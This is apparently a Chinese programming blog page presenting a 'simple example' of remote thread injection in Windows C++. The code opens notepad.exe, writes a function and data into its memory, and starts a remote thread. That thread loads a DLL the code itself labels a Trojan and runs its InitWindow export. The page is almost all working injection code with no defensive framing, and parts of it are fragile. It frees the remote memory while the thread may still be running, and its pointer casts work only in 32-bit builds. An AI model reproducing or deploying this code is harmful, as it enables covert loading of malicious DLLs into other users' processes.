注入远程线程简单例子[修改]
#include <windows.h>
#include <tlhelp32.h>
#include <cstdio>
using namespace std;
#pragma warning(disable:4311)
#pragma warning(disable:4312)
DWORD FindTarget(LPCTSTR lpszProcess)
{
DWORD dwRet = 0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe32);
do{
if(lstrcmpi(pe32.szExeFile,lpszProcess) == 0){
dwRet = pe32.th32ProcessID;
break;
}
}while(Process32Next(hSnapshot,&pe32));
CloseHandle(hSnapshot);
return dwRet;
}
// ========== 定义一个代码结构,本例为一个对话框============
struct MyData
{
char sz[64]; // 对话框显示内容
DWORD dwMessageBox; // 对话框的地址
char szTrojan[256];
char szKernel[64];
DWORD dwLoadLibrary;
DWORD dwGetProcAddress;
DWORD dwTrojanEntry;
DWORD dwGetModuleHandle;
char szCmd[64];
};
// ========== 远程线程的函数 ==============================
DWORD __stdcall RMTFunc(MyData *pData)
{
typedef int(__stdcall*MMessageBox)(HWND,LPCTSTR,LPCTSTR,UINT);
MMessageBox MsgBox = (MMessageBox)pData->dwMessageBox;
MsgBox(NULL, pData->sz, NULL, MB_OK);
typedef HMODULE (__stdcall* PLoadLibrary)(LPCTSTR);
PLoadLibrary plib = (PLoadLibrary)pData->dwLoadLibrary;
plib(pData->szKernel); //加载Kernel32.dll
typedef FARPROC (__stdcall* PGetProcAddress)(HMODULE,LPCSTR);
PGetProcAddress pGPAddress = (PGetProcAddress)pData->dwGetProcAddress;
typedef HMODULE (__stdcall* PGetModuleHandle)(LPCTSTR);
PGetModuleHandle pGMHandle = (PGetModuleHandle)pData->dwGetModuleHandle;
//PGetModuleHandle(plib(pData->szTrojan)); //加载TrojanDLL
HINSTANCE hTrojan = plib(pData->szTrojan);
typedef int (__stdcall* iw)();
iw iww = (iw)pGPAddress(hTrojan,pData->szCmd);
iww(); //加载svDLLLG.dll中的InitWindow
return 0;
}
int main(int argc, char* argv[])
{
// ===== 获得需要创建REMOTETHREAD的进程句柄 ===============================
DWORD dwProcessId = FindTarget("notepad.exe");
HANDLE hProcess = OpenProcess(
PROCESS_ALL_ACCESS,
FALSE,
dwProcessId);
// ========= 代码结构 ================================================
TCHAR strTName[MAX_PATH];
MyData data;
ZeroMemory(&data, sizeof (MyData));
strcat(data.sz, "对话框的内容.");
strcat(data.szKernel,"Kernel32.dll");
HINSTANCE hTrojan = LoadLibrary("svDLLLG.dll");
GetModuleFileName(hTrojan,strTName,MAX_PATH);
strcat(data.szTrojan,strTName);
strcat(data.szCmd,"InitWindow");
HINSTANCE hUser = LoadLibrary("user32.dll");
HINSTANCE hKernel = LoadLibrary("Kernel32.dll");
if(!hKernel){
printf("Can not load library\n");
return 0;
}
if (! hUser)
{
printf("Can not load library.\n");
return 0;
}
data.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
data.dwGetProcAddress = (DWORD)GetProcAddress(hKernel,"GetProcAddress");
data.dwLoadLibrary = (DWORD)GetProcAddress(hKernel,"LoadLibraryA");
data.dwGetModuleHandle = (DWORD)GetProcAddress(hKernel,"GetModuleHandleA");
FreeLibrary(hUser);
FreeLibrary(hKernel);
FreeLibrary(hTrojan);
if (! data.dwMessageBox)
return 0;
// ======= 分配空间 ===================================================
void *pRemoteThread
= VirtualAllocEx(hProcess, 0,
1024*4, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (! pRemoteThread)
return 0;
if (! WriteProcessMemory(hProcess, pRemoteThread, &RMTFunc, 1024*4, 0))
return 0;
MyData *pData
= (MyData*)VirtualAllocEx(hProcess, 0,
sizeof (MyData), MEM_COMMIT,
PAGE_READWRITE);
if (!pData)
return 0;
if (! WriteProcessMemory(hProcess, pData, &data, sizeof (MyData), 0))
return 0;
// =========== 创建远程线程 ===========================================
HANDLE hThread
= CreateRemoteThread(hProcess, 0,
0, (LPTHREAD_START_ROUTINE)pRemoteThread,
pData, 0, 0);
if (! hThread)
{
printf("远程线程创建失败");
return 0;
}
CloseHandle(hThread);
VirtualFreeEx(hProcess, pRemoteThread, 1024*3, MEM_RELEASE);
VirtualFreeEx(hProcess, pData, sizeof (MyData), MEM_RELEASE);
CloseHandle(hProcess);
printf("Hello World!\n");
return 0;
}
浙公网安备 33010602011771号